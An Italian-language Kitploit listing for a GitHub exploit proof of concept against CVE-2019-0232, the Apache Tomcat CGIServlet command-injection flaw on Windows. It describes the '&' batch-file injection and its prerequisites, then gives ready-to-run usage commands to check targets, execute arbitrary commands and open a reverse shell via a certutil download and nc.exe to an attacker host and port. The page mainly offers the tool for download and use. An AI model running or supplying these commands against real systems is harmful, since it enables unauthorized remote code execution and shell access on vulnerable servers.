Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-0232 — CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - Exploit PoC | Kitploit
Strumenti/GitHubGitHub/yuzuki-ayanami/cve-2019-0232
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubyuzuki-ayanami/cve-2019-0232

CVE-2019-0232

CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - Exploit PoC

Vedi Repository
11112 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
tomcat

CVE-2019-0232

Apache Tomcat CGIServlet enableCmdLineArguments RCE

Iniezione di script batch di Windows tramite argomenti della query string

Descrizione

Apache Tomcat con il servlet CGI abilitato e enableCmdLineArguments=true passa i parametri della query string come argomenti da riga di comando agli script CGI. Su Windows, i file batch (.bat/.cmd) interpretano & come separatore di comandi, consentendo l'esecuzione arbitraria di comandi tramite un URL appositamente predisposto.

Prerequisiti

  • Servlet CGI abilitata in conf/web.xml o WEB-INF/web.xml
  • enableCmdLineArguments=true nei parametri di init della servlet CGI
  • Uno script CGI (es. ism.bat) distribuito e accessibile
  • Target Windows (i file batch sono necessari per l'iniezione tramite &)

Utilizzo

git clone https://github.com/yuzuki-ayanami/CVE-2019-0232
cd CVE-2019-0232
pip install -r requirements.txt

Verifica se l'endpoint CGI esiste:

python cve-2019-0232.py check -t http://target:8080
python cve-2019-0232.py check -t http://target:8080 --cgi /cgi-bin/printenv.bat

Esegui un comando:

python cve-2019-0232.py exec -t http://target:8080 -c whoami
python cve-2019-0232.py exec -t http://target:8080 -c 'ipconfig'

Reverse shell (certutil a 2 stadi + nc.exe):

python cve-2019-0232.py revshell -t http://target:8080 --lhost 10.0.0.1 --lport 4444

Requisiti

  • Python 3.8+
  • requests
  • Target Windows (la vulnerabilità è specifica del sistema operativo)
Scarica lo strumento